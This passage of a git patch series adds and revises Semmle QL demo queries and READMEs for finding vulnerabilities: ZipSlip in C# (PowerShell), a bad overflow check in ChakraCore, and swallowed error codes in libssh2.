09:28:03 +0000 Subject: [PATCH 11/36] expand readme --- README.md | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 819d310..5e3c591 100644 --- a/README.md +++ b/README.md @@ -1,10 +1,14 @@ # Semmle Demos -This open source repository contains demos of Semmle's products: QL and LGTM. Many of the demos are examples of security vulnerabilities that were found by a QL query. These demos contain step-by-step instructions on how to build a QL query that finds the vulnerability. +This open source repository contains demos of Semmle's products: [QL](https://semmle.com/ql) and [LGTM](https://lgtm.com/). Many of the demos are examples of security vulnerabilities that were found by a QL query. These demos contain step-by-step instructions on how to build a QL query that finds the vulnerability. ## How do I run the demos? -You can use the [interactive query console](https://lgtm.com/help/lgtm/using-query-console) or the [QL for Eclipse](https://lgtm.com/help/lgtm/running-queries-ide) plugin. +Each demo consists of a snapshot database and a series of query files. Each query is annotated with useful information and to explain it's purpose. To run a demo, import the associated files into the the [QL for Eclipse](https://lgtm.com/help/lgtm/running-queries-ide) plugin, and run the queries. For detailed instructions on installing QL for Eclipse, importing snapshots, and running queries, see the [QL for Eclipse online help](https://help.semmle.com/ql-for-eclipse/Content/WebHelp/install-plugin-free.html). You can also run the queries in the [interactive query console](https://lgtm.com/help/lgtm/using-query-console). + +## How do I learn more about QL? + +QL is Semmle's variant analysis engine, and there is [extensive documentation](https://help.semmle.com/QL/learn-ql/) available to help you learn to write your own queries. You can also explore the QL queries and libraries by visiting the [Semmmle/ql repository](https://github.com/semmle/ql). QL is open source, and we welcome contributions or improvements from the community–see our [contributing guidelines](https://github.com/Semmle/ql/blob/master/CONTRIBUTING.md) for further information. ## License From 161c3d29dd03da892e484b76481f2022056aac23 Mon Sep 17 00:00:00 2001 From: james Date: Fri, 15 Mar 2019 10:15:40 +0000 Subject: [PATCH 12/36] readme typo --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 5e3c591..73a9627 100644 --- a/README.md +++ b/README.md @@ -4,7 +4,7 @@ This open source repository contains demos of Semmle's products: [QL](https://se ## How do I run the demos? -Each demo consists of a snapshot database and a series of query files. Each query is annotated with useful information and to explain it's purpose. To run a demo, import the associated files into the the [QL for Eclipse](https://lgtm.com/help/lgtm/running-queries-ide) plugin, and run the queries. For detailed instructions on installing QL for Eclipse, importing snapshots, and running queries, see the [QL for Eclipse online help](https://help.semmle.com/ql-for-eclipse/Content/WebHelp/install-plugin-free.html). You can also run the queries in the [interactive query console](https://lgtm.com/help/lgtm/using-query-console). +Each demo consists of a snapshot database and a series of query files. Each query is annotated with useful information and to explain it's purpose. To run a demo, import the associated files into the [QL for Eclipse](https://lgtm.com/help/lgtm/running-queries-ide) plugin, and run the queries. For detailed instructions on installing QL for Eclipse, importing snapshots, and running queries, see the [QL for Eclipse online help](https://help.semmle.com/ql-for-eclipse/Content/WebHelp/install-plugin-free.html). You can also run the queries in the [interactive query console](https://lgtm.com/help/lgtm/using-query-console). ## How do I learn more about QL? From 6d39584596194e6e8d569787ad543f7d13b3a0b8 Mon Sep 17 00:00:00 2001 From: james Date: Mon, 18 Mar 2019 14:21:19 +0000 Subject: [PATCH 13/36] readme: small fixes --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 73a9627..b4a319a 100644 --- a/README.md +++ b/README.md @@ -4,11 +4,11 @@ This open source repository contains demos of Semmle's products: [QL](https://se ## How do I run the demos? -Each demo consists of a snapshot database and a series of query files. Each query is annotated with useful information and to explain it's purpose. To run a demo, import the associated files into the [QL for Eclipse](https://lgtm.com/help/lgtm/running-queries-ide) plugin, and run the queries. For detailed instructions on installing QL for Eclipse, importing snapshots, and running queries, see the [QL for Eclipse online help](https://help.semmle.com/ql-for-eclipse/Content/WebHelp/install-plugin-free.html). You can also run the queries in the [interactive query console](https://lgtm.com/help/lgtm/using-query-console). +Each demo consists of a snapshot database and a series of query files. Each query is annotated with useful information to explain its purpose. To run a demo, import the associated files into the [QL for Eclipse](https://lgtm.com/help/lgtm/running-queries-ide) plugin, and run the queries. For detailed instructions on installing QL for Eclipse, importing snapshots, and running queries, see the [QL for Eclipse online help](https://help.semmle.com/ql-for-eclipse/Content/WebHelp/install-plugin-free.html). You can also run the queries in the [interactive query console](https://lgtm.com/help/lgtm/using-query-console) on LGTM. ## How do I learn more about QL? -QL is Semmle's variant analysis engine, and there is [extensive documentation](https://help.semmle.com/QL/learn-ql/) available to help you learn to write your own queries. You can also explore the QL queries and libraries by visiting the [Semmmle/ql repository](https://github.com/semmle/ql). QL is open source, and we welcome contributions or improvements from the community–see our [contributing guidelines](https://github.com/Semmle/ql/blob/master/CONTRIBUTING.md) for further information. +QL is Semmle's variant analysis engine, and there is [extensive documentation](https://help.semmle.com/QL/learn-ql/) available to help you learn to write your own queries. You can also explore the QL queries and libraries by visiting the [Semmle/ql repository](https://github.com/semmle/ql). QL is open source, and we welcome contributions or improvements from the community–see our [contributing guidelines](https://github.com/Semmle/ql/blob/master/CONTRIBUTING.md) for further information. ## License From 7b8ac156703fddb8281e77b55969ac1576bb15d0 Mon Sep 17 00:00:00 2001 From: calum Date: Mon, 25 Mar 2019 18:51:35 +0000 Subject: [PATCH 14/36] ZipSlip C# demo --- ql_demos/csharp/ZipSlip/01_Sinks.ql | 5 +++ ql_demos/csharp/ZipSlip/02_SinkArgument.ql | 5 +++ ql_demos/csharp/ZipSlip/03_Sources.ql | 5 +++ ql_demos/csharp/ZipSlip/04_Sources.ql | 7 +++ ql_demos/csharp/ZipSlip/05_LocalFlow.ql | 12 +++++ ql_demos/csharp/ZipSlip/06_GlobalFlow.ql | 24 ++++++++++ ql_demos/csharp/ZipSlip/README.md | 52 ++++++++++++++++++++++ ql_demos/csharp/queries.xml | 1 + 8 files changed, 111 insertions(+) create mode 100644 ql_demos/csharp/ZipSlip/01_Sinks.ql create mode 100644 ql_demos/csharp/ZipSlip/02_SinkArgument.ql create mode 100644 ql_demos/csharp/ZipSlip/03_Sources.ql create mode 100644 ql_demos/csharp/ZipSlip/04_Sources.ql create mode 100644 ql_demos/csharp/ZipSlip/05_LocalFlow.ql create mode 100644 ql_demos/csharp/ZipSlip/06_GlobalFlow.ql create mode 100644 ql_demos/csharp/ZipSlip/README.md create mode 100644 ql_demos/csharp/queries.xml diff --git a/ql_demos/csharp/ZipSlip/01_Sinks.ql b/ql_demos/csharp/ZipSlip/01_Sinks.ql new file mode 100644 index 0000000..4836bff --- /dev/null +++ b/ql_demos/csharp/ZipSlip/01_Sinks.ql @@ -0,0 +1,5 @@ +import csharp + +from MethodCall c +where c.getTarget().hasName("ExtractToFile") +select c, "Call to ExtractToFile." diff --git a/ql_demos/csharp/ZipSlip/02_SinkArgument.ql b/ql_demos/csharp/ZipSlip/02_SinkArgument.ql new file mode 100644 index 0000000..f839b8d --- /dev/null +++ b/ql_demos/csharp/ZipSlip/02_SinkArgument.ql @@ -0,0 +1,5 @@ +import csharp + +from MethodCall c +where c.getTarget().hasName("ExtractToFile") +select c.getArgument(1), "Argument to ExtractToFile." diff --git a/ql_demos/csharp/ZipSlip/03_Sources.ql b/ql_demos/csharp/ZipSlip/03_Sources.ql new file mode 100644 index 0000000..04c9d35 --- /dev/null +++ b/ql_demos/csharp/ZipSlip/03_Sources.ql @@ -0,0 +1,5 @@ +import csharp + +from Property p +where p.hasName("FullName") +select p.getAnAccess() diff --git a/ql_demos/csharp/ZipSlip/04_Sources.ql b/ql_demos/csharp/ZipSlip/04_Sources.ql new file mode 100644 index 0000000..4c22f9f --- /dev/null +++ b/ql_demos/csharp/ZipSlip/04_Sources.ql @@ -0,0 +1,7 @@ +import csharp + +from Property p +where + p.hasName("FullName") and + p.getDeclaringType().hasName("ZipArchiveEntry") +select p.getAnAccess() diff --git a/ql_demos/csharp/ZipSlip/05_LocalFlow.ql b/ql_demos/csharp/ZipSlip/05_LocalFlow.ql new file mode 100644 index 0000000..9f80c98 --- /dev/null +++ b/ql_demos/csharp/ZipSlip/05_LocalFlow.ql @@ -0,0 +1,12 @@ +import csharp +import semmle.code.csharp.dataflow.TaintTracking + +from DataFlow::Node source, DataFlow::Node sink, MethodCall c, Property p +where + c.getTarget().hasName("ExtractToFile") and + p.hasName("FullName") and + p.getDeclaringType().hasName("ZipArchiveEntry") and + sink.asExpr() = c.getAnArgument() and + source.asExpr() = p.getAnAccess() and + TaintTracking::localTaint(source, sink) +select sink, "ZipSlip from $@.", source, source.toString() diff --git a/ql_demos/csharp/ZipSlip/06_GlobalFlow.ql b/ql_demos/csharp/ZipSlip/06_GlobalFlow.ql new file mode 100644 index 0000000..d46d234 --- /dev/null +++ b/ql_demos/csharp/ZipSlip/06_GlobalFlow.ql @@ -0,0 +1,24 @@ +import csharp +import semmle.code.csharp.dataflow.TaintTracking + +class ZipSlipTaintTracking extends TaintTracking::Configuration { + ZipSlipTaintTracking() { this = "Zip Slip taint tracking" } + + override predicate isSource(DataFlow::Node node) { + exists(Property p | + p.hasName("FullName") and + p.getDeclaringType().hasName("ZipArchiveEntry") and + node.asExpr() = p.getAnAccess() + ) + } + + override predicate isSink(DataFlow::Node node) { + exists(MethodCall call | call.getTarget().hasName("ExtractToFile") | + node.asExpr() = call.getAnArgument() + ) + } +} + +from ZipSlipTaintTracking config, DataFlow::Node source, DataFlow::Node sink +where config.hasFlow(source, sink) +select sink, "Zip Slip vulnerability from $@.", source, source.toString() diff --git a/ql_demos/csharp/ZipSlip/README.md b/ql_demos/csharp/ZipSlip/README.md new file mode 100644 index 0000000..058cfad --- /dev/null +++ b/ql_demos/csharp/ZipSlip/README.md @@ -0,0 +1,52 @@ +# C# Zip Slip demo + +## Snapshot + +Use [this snapshot](http://downloads.lgtm.com/snapshots/csharp/microsoft/powershell/PowerShell_PowerShell_csharp-srcVersion_450d884668ca477c6581ce597958f021fac30bff-dist_odasa-lgtm-2018-09-11-e5cbe16-linux64.zip) +of PowerShell. + +## Introduction + +The "Zip Slip" vulnerability was announced on June 5th 2018, by [Snyk](https://snyk.io/research/zip-slip-vulnerability). +You can see on [this page](https://snyk.io/research/zip-slip-vulnerability#dot-net) some sample code that shows the vulnerable code. + +Microsoft immediately wanted to search their codebase to see if any of their own code was vulnerable. Within a few days, +they had written a basic query and run it on their own LGTM-e instances that turned up several results across +several codeases. Because Semmle has a close working relationship with Microsoft, we then helped Microsoft to refine +that query further and submit it as a [pull request](https://github.com/Semmle/ql/pull/54) against our open source QL repository. + +It was deployed within 2 weeks where it was run over thousands of open source C# projects. + +Here are some [sample results](https://lgtm.com/rules/1506511188430/alerts/) for the ZipSlip query. +One of those projects was Microsoft PowerShell. + +As a result of this query, [a senior Microsoft engineer](https://github.com/TravisEz13) +fixed this query in November 2018 in +[this PR](https://lgtm.com/projects/g/PowerShell/PowerShell/rev/b39a41109d86d9ba75f966e2d7b52b81fa629150). + +So how did they do it? + +## Query 1-4: Exploring sources and sinks + +Open the snapshot in QL4E, and show QL as a simple query language for identifying sources and sinks. Look for sinks +(calls to `ExtractToFile`), noting that we actually want to identify the vulnerable argument. + +Sources are identified by for example the `FullName` property of `ZipArchiveEntry`. If we omit the +name of the declaring type, we get too many results, and the full query would use the qualified name of +the property. + +Already we've found the vulnerable code. + +## Query 5 + +This query uses local dataflow to find data flow from the source to the sink. We actually need to use taint tracking +due to the use of `Path.Combine`. + +## Query 6 + +This uses a global taint tracking configuration. + +# Final query + +The [final query](https://lgtm.com/rules/1506511188430/) includes query help, and identifies various other sources and sinks, +but uses the same general structure. It also includes metadata for LGTM. diff --git a/ql_demos/csharp/queries.xml b/ql_demos/csharp/queries.xml new file mode 100644 index 0000000..56abe77 --- /dev/null +++ b/ql_demos/csharp/queries.xml @@ -0,0 +1 @@ + From 779f50787782f65616f6549bb6814831487618ac Mon Sep 17 00:00:00 2001 From: calum Date: Fri, 29 Mar 2019 16:49:10 +0000 Subject: [PATCH 15/36] C#: Address review comments. Reorder the queries. --- ql_demos/csharp/ZipSlip/{03_Sources.ql => 01_Sources.ql} | 0 ql_demos/csharp/ZipSlip/{04_Sources.ql => 02_Sources.ql} | 0 ql_demos/csharp/ZipSlip/{01_Sinks.ql => 03_Sinks.ql} | 2 +- .../ZipSlip/{02_SinkArgument.ql => 04_SinkArgument.ql} | 2 +- ql_demos/csharp/ZipSlip/README.md | 6 +++--- 5 files changed, 5 insertions(+), 5 deletions(-) rename ql_demos/csharp/ZipSlip/{03_Sources.ql => 01_Sources.ql} (100%) rename ql_demos/csharp/ZipSlip/{04_Sources.ql => 02_Sources.ql} (100%) rename ql_demos/csharp/ZipSlip/{01_Sinks.ql => 03_Sinks.ql} (66%) rename ql_demos/csharp/ZipSlip/{02_SinkArgument.ql => 04_SinkArgument.ql} (56%) diff --git a/ql_demos/csharp/ZipSlip/03_Sources.ql b/ql_demos/csharp/ZipSlip/01_Sources.ql similarity index 100% rename from ql_demos/csharp/ZipSlip/03_Sources.ql rename to ql_demos/csharp/ZipSlip/01_Sources.ql diff --git a/ql_demos/csharp/ZipSlip/04_Sources.ql b/ql_demos/csharp/ZipSlip/02_Sources.ql similarity index 100% rename from ql_demos/csharp/ZipSlip/04_Sources.ql rename to ql_demos/csharp/ZipSlip/02_Sources.ql diff --git a/ql_demos/csharp/ZipSlip/01_Sinks.ql b/ql_demos/csharp/ZipSlip/03_Sinks.ql similarity index 66% rename from ql_demos/csharp/ZipSlip/01_Sinks.ql rename to ql_demos/csharp/ZipSlip/03_Sinks.ql index 4836bff..ce9ac02 100644 --- a/ql_demos/csharp/ZipSlip/01_Sinks.ql +++ b/ql_demos/csharp/ZipSlip/03_Sinks.ql @@ -2,4 +2,4 @@ import csharp from MethodCall c where c.getTarget().hasName("ExtractToFile") -select c, "Call to ExtractToFile." +select c diff --git a/ql_demos/csharp/ZipSlip/02_SinkArgument.ql b/ql_demos/csharp/ZipSlip/04_SinkArgument.ql similarity index 56% rename from ql_demos/csharp/ZipSlip/02_SinkArgument.ql rename to ql_demos/csharp/ZipSlip/04_SinkArgument.ql index f839b8d..5164334 100644 --- a/ql_demos/csharp/ZipSlip/02_SinkArgument.ql +++ b/ql_demos/csharp/ZipSlip/04_SinkArgument.ql @@ -2,4 +2,4 @@ import csharp from MethodCall c where c.getTarget().hasName("ExtractToFile") -select c.getArgument(1), "Argument to ExtractToFile." +select c.getArgument(1) diff --git a/ql_demos/csharp/ZipSlip/README.md b/ql_demos/csharp/ZipSlip/README.md index 058cfad..e47631d 100644 --- a/ql_demos/csharp/ZipSlip/README.md +++ b/ql_demos/csharp/ZipSlip/README.md @@ -11,17 +11,17 @@ The "Zip Slip" vulnerability was announced on June 5th 2018, by [Snyk](https://s You can see on [this page](https://snyk.io/research/zip-slip-vulnerability#dot-net) some sample code that shows the vulnerable code. Microsoft immediately wanted to search their codebase to see if any of their own code was vulnerable. Within a few days, -they had written a basic query and run it on their own LGTM-e instances that turned up several results across +they had written a basic query and run it on their own LGTM Enterprise instances that turned up several results across several codeases. Because Semmle has a close working relationship with Microsoft, we then helped Microsoft to refine that query further and submit it as a [pull request](https://github.com/Semmle/ql/pull/54) against our open source QL repository. -It was deployed within 2 weeks where it was run over thousands of open source C# projects. +It was deployed to [LGTM.com](https://lgtm.com) within 2 weeks where it was run over thousands of open source C# projects. Here are some [sample results](https://lgtm.com/rules/1506511188430/alerts/) for the ZipSlip query. One of those projects was Microsoft PowerShell. As a result of this query, [a senior Microsoft engineer](https://github.com/TravisEz13) -fixed this query in November 2018 in +fixed this vulnerability in November 2018 in [this PR](https://lgtm.com/projects/g/PowerShell/PowerShell/rev/b39a41109d86d9ba75f966e2d7b52b81fa629150). So how did they do it? From 534ed74c165a3f74a2dcdbadb0d54fa33fcacdb2 Mon Sep 17 00:00:00 2001 From: calum Date: Mon, 1 Apr 2019 11:34:52 +0100 Subject: [PATCH 16/36] Address review feedback. --- ql_demos/csharp/ZipSlip/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/ql_demos/csharp/ZipSlip/README.md b/ql_demos/csharp/ZipSlip/README.md index e47631d..03822bb 100644 --- a/ql_demos/csharp/ZipSlip/README.md +++ b/ql_demos/csharp/ZipSlip/README.md @@ -11,8 +11,8 @@ The "Zip Slip" vulnerability was announced on June 5th 2018, by [Snyk](https://s You can see on [this page](https://snyk.io/research/zip-slip-vulnerability#dot-net) some sample code that shows the vulnerable code. Microsoft immediately wanted to search their codebase to see if any of their own code was vulnerable. Within a few days, -they had written a basic query and run it on their own LGTM Enterprise instances that turned up several results across -several codeases. Because Semmle has a close working relationship with Microsoft, we then helped Microsoft to refine +they had written a basic query and run it against a number of critical codebases, turning up multiple valuable results. +Because Semmle has a close working relationship with Microsoft, we then helped Microsoft to refine that query further and submit it as a [pull request](https://github.com/Semmle/ql/pull/54) against our open source QL repository. It was deployed to [LGTM.com](https://lgtm.com) within 2 weeks where it was run over thousands of open source C# projects. From bbf8deeb16673409c9547033dd6eb544a37b7838 Mon Sep 17 00:00:00 2001 From: Jonas Jensen Date: Tue, 28 May 2019 14:01:39 +0200 Subject: [PATCH 17/36] Bad overflow check broken into three steps When demoing this, I found it more convenient to split the query into three steps so there are also some false positives to look at along the way. --- .../steps/01_overflow_checks.ql | 14 ++++++++++++++ .../steps/02_var_size.ql | 15 +++++++++++++++ .../steps/03_bad_overflow_check.ql | 16 ++++++++++++++++ 3 files changed, 45 insertions(+) create mode 100644 ql_demos/cpp/ChakraCore-bad-overflow-check/steps/01_overflow_checks.ql create mode 100644 ql_demos/cpp/ChakraCore-bad-overflow-check/steps/02_var_size.ql create mode 100644 ql_demos/cpp/ChakraCore-bad-overflow-check/steps/03_bad_overflow_check.ql diff --git a/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/01_overflow_checks.ql b/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/01_overflow_checks.ql new file mode 100644 index 0000000..be8d17d --- /dev/null +++ b/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/01_overflow_checks.ql @@ -0,0 +1,14 @@ +import cpp + +/** Matches `var < var + ???`. */ +predicate overflowCheck(LocalScopeVariable var, AddExpr add) { + exists(RelationalOperation compare | + compare.getAnOperand() = var.getAnAccess() and + compare.getAnOperand() = add and + add.getAnOperand() = var.getAnAccess() + ) +} + +from LocalScopeVariable var, AddExpr add +where overflowCheck(var, add) +select add, "Overflow check on variable of type " + var.getUnderlyingType() diff --git a/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/02_var_size.ql b/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/02_var_size.ql new file mode 100644 index 0000000..d546a6f --- /dev/null +++ b/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/02_var_size.ql @@ -0,0 +1,15 @@ +import cpp + +/** Matches `var < var + ???`. */ +predicate overflowCheck(LocalScopeVariable var, AddExpr add) { + exists(RelationalOperation compare | + compare.getAnOperand() = var.getAnAccess() and + compare.getAnOperand() = add and + add.getAnOperand() = var.getAnAccess() + ) +} + +from LocalScopeVariable var, AddExpr add +where overflowCheck(var, add) + and var.getType().getSize() < 4 +select add, "Overflow check on variable of type " + var.getUnderlyingType() diff --git a/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/03_bad_overflow_check.ql b/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/03_bad_overflow_check.ql new file mode 100644 index 0000000..09114f1 --- /dev/null +++ b/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/03_bad_overflow_check.ql @@ -0,0 +1,16 @@ +import cpp + +/** Matches `var < var + ???`. */ +predicate overflowCheck(LocalScopeVariable var, AddExpr add) { + exists(RelationalOperation compare | + compare.getAnOperand() = var.getAnAccess() and + compare.getAnOperand() = add and + add.getAnOperand() = var.getAnAccess() + ) +} + +from LocalScopeVariable var, AddExpr add +where overflowCheck(var, add) + and var.getType().getSize() < 4 + and not add.getConversion+().getType().getSize() < 4 +select add, "Bad overflow check on variable of type " + var.getUnderlyingType() From e530f1153810b48f84213df6ace30a3019606c0c Mon Sep 17 00:00:00 2001 From: Jonas Jensen Date: Wed, 29 May 2019 13:35:08 +0200 Subject: [PATCH 18/36] Bad overflow check: replace `exists` with `_`-arg --- .../steps/01_overflow_checks.ql | 12 +++++------- .../steps/02_var_size.ql | 12 +++++------- .../steps/03_bad_overflow_check.ql | 12 +++++------- 3 files changed, 15 insertions(+), 21 deletions(-) diff --git a/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/01_overflow_checks.ql b/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/01_overflow_checks.ql index be8d17d..6af7831 100644 --- a/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/01_overflow_checks.ql +++ b/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/01_overflow_checks.ql @@ -1,14 +1,12 @@ import cpp /** Matches `var < var + ???`. */ -predicate overflowCheck(LocalScopeVariable var, AddExpr add) { - exists(RelationalOperation compare | - compare.getAnOperand() = var.getAnAccess() and - compare.getAnOperand() = add and - add.getAnOperand() = var.getAnAccess() - ) +predicate overflowCheck(LocalScopeVariable var, AddExpr add, RelationalOperation compare) { + compare.getAnOperand() = var.getAnAccess() and + compare.getAnOperand() = add and + add.getAnOperand() = var.getAnAccess() } from LocalScopeVariable var, AddExpr add -where overflowCheck(var, add) +where overflowCheck(var, add, _) select add, "Overflow check on variable of type " + var.getUnderlyingType() diff --git a/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/02_var_size.ql b/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/02_var_size.ql index d546a6f..6a57367 100644 --- a/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/02_var_size.ql +++ b/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/02_var_size.ql @@ -1,15 +1,13 @@ import cpp /** Matches `var < var + ???`. */ -predicate overflowCheck(LocalScopeVariable var, AddExpr add) { - exists(RelationalOperation compare | - compare.getAnOperand() = var.getAnAccess() and - compare.getAnOperand() = add and - add.getAnOperand() = var.getAnAccess() - ) +predicate overflowCheck(LocalScopeVariable var, AddExpr add, RelationalOperation compare) { + compare.getAnOperand() = var.getAnAccess() and + compare.getAnOperand() = add and + add.getAnOperand() = var.getAnAccess() } from LocalScopeVariable var, AddExpr add -where overflowCheck(var, add) +where overflowCheck(var, add, _) and var.getType().getSize() < 4 select add, "Overflow check on variable of type " + var.getUnderlyingType() diff --git a/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/03_bad_overflow_check.ql b/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/03_bad_overflow_check.ql index 09114f1..d927ef1 100644 --- a/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/03_bad_overflow_check.ql +++ b/ql_demos/cpp/ChakraCore-bad-overflow-check/steps/03_bad_overflow_check.ql @@ -1,16 +1,14 @@ import cpp /** Matches `var < var + ???`. */ -predicate overflowCheck(LocalScopeVariable var, AddExpr add) { - exists(RelationalOperation compare | - compare.getAnOperand() = var.getAnAccess() and - compare.getAnOperand() = add and - add.getAnOperand() = var.getAnAccess() - ) +predicate overflowCheck(LocalScopeVariable var, AddExpr add, RelationalOperation compare) { + compare.getAnOperand() = var.getAnAccess() and + compare.getAnOperand() = add and + add.getAnOperand() = var.getAnAccess() } from LocalScopeVariable var, AddExpr add -where overflowCheck(var, add) +where overflowCheck(var, add, _) and var.getType().getSize() < 4 and not add.getConversion+().getType().getSize() < 4 select add, "Bad overflow check on variable of type " + var.getUnderlyingType() From 1d85c56c29910d8bef801b3906828c1cd9cf67e2 Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Tue, 23 Jul 2019 09:52:04 +0100 Subject: [PATCH 19/36] libssh2 eating error codes demo. --- ql_demos/cpp/README.md | 1 + .../00_error_codes.ql | 9 +++++++++ .../01_error_codes_call.ql | 11 ++++++++++ .../02_eating_error_codes.ql | 12 +++++++++++ .../03_eating_error_codes_localflow.ql | 18 +++++++++++++++++ ...ing_error_codes_localflow_rangeanalysis.ql | 20 +++++++++++++++++++ 6 files changed, 71 insertions(+) create mode 100644 ql_demos/cpp/README.md create mode 100644 ql_demos/cpp/libssh2_eating_error_codes/00_error_codes.ql create mode 100644 ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql create mode 100644 ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql create mode 100644 ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql create mode 100644 ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql diff --git a/ql_demos/cpp/README.md b/ql_demos/cpp/README.md new file mode 100644 index 0000000..47dd67a --- /dev/null +++ b/ql_demos/cpp/README.md @@ -0,0 +1 @@ +[snapshot](https://downloads.lgtm.com/snapshots/cpp/libssh2/libssh2_libssh2_C_C++_38bf7ce.zip) diff --git a/ql_demos/cpp/libssh2_eating_error_codes/00_error_codes.ql b/ql_demos/cpp/libssh2_eating_error_codes/00_error_codes.ql new file mode 100644 index 0000000..dd728ca --- /dev/null +++ b/ql_demos/cpp/libssh2_eating_error_codes/00_error_codes.ql @@ -0,0 +1,9 @@ +/** + * @name 00_error_codes + */ + +import cpp + +from ReturnStmt ret +where ret.getExpr().getValue().toInt() < 0 +select ret \ No newline at end of file diff --git a/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql b/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql new file mode 100644 index 0000000..1a456ef --- /dev/null +++ b/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql @@ -0,0 +1,11 @@ +/** + * @name 01_error_codes_call + */ + +import cpp + +from Function f, FunctionCall call, ReturnStmt ret +where call.getTarget() = f +and ret.getEnclosingFunction() = f +and ret.getExpr().getValue().toInt() < 0 +select call, ret \ No newline at end of file diff --git a/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql b/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql new file mode 100644 index 0000000..bb92c7f --- /dev/null +++ b/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql @@ -0,0 +1,12 @@ +/** + * @name 02_eating_error_codes + */ + +import cpp + +from Function f, FunctionCall call, ReturnStmt ret +where call.getTarget() = f +and ret.getEnclosingFunction() = f +and ret.getExpr().getValue().toInt() < 0 +and call.getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() +select call, ret \ No newline at end of file diff --git a/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql b/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql new file mode 100644 index 0000000..25a7c67 --- /dev/null +++ b/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql @@ -0,0 +1,18 @@ +/** + * @name 03_eating_error_codes_localflow + */ + +import cpp +import semmle.code.cpp.dataflow.DataFlow + +// int r = f(); +// unsigned int x = r; + +from Function f, FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink +where call.getTarget() = f +and ret.getEnclosingFunction() = f +and ret.getExpr().getValue().toInt() < 0 +and source.asExpr() = call +and DataFlow::localFlow(source, sink) +and sink.asExpr().getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() +select source, sink \ No newline at end of file diff --git a/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql b/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql new file mode 100644 index 0000000..a50a906 --- /dev/null +++ b/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql @@ -0,0 +1,20 @@ +/** + * @name 04_eating_error_codes_localflow_rangeanalysis + */ + +import cpp +import semmle.code.cpp.dataflow.DataFlow +import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis + +// int r = f(); +// unsigned int x = r; + +from Function f, FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink +where call.getTarget() = f +and ret.getEnclosingFunction() = f +and ret.getExpr().getValue().toInt() < 0 +and source.asExpr() = call +and DataFlow::localFlow(source, sink) +and sink.asExpr().getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() +and lowerBound(sink.asExpr()) < 0 +select sink \ No newline at end of file From c698e1f8e663a8afe6b6d835c1f88675fd553a55 Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Tue, 23 Jul 2019 09:57:19 +0100 Subject: [PATCH 20/36] Update example. --- .../04_eating_error_codes_localflow_rangeanalysis.ql | 1 + 1 file changed, 1 insertion(+) diff --git a/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql b/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql index a50a906..81f227a 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql @@ -7,6 +7,7 @@ import semmle.code.cpp.dataflow.DataFlow import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis // int r = f(); +// if (r < 0) return -1; // unsigned int x = r; from Function f, FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink From 85efb235337f069ec284004fecab0e45baf8cdac Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Tue, 23 Jul 2019 10:04:15 +0100 Subject: [PATCH 21/36] Minor edits --- ql_demos/cpp/libssh2_eating_error_codes/00_error_codes.ql | 2 +- ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql | 2 +- .../cpp/libssh2_eating_error_codes/02_eating_error_codes.ql | 2 +- .../03_eating_error_codes_localflow.ql | 2 +- 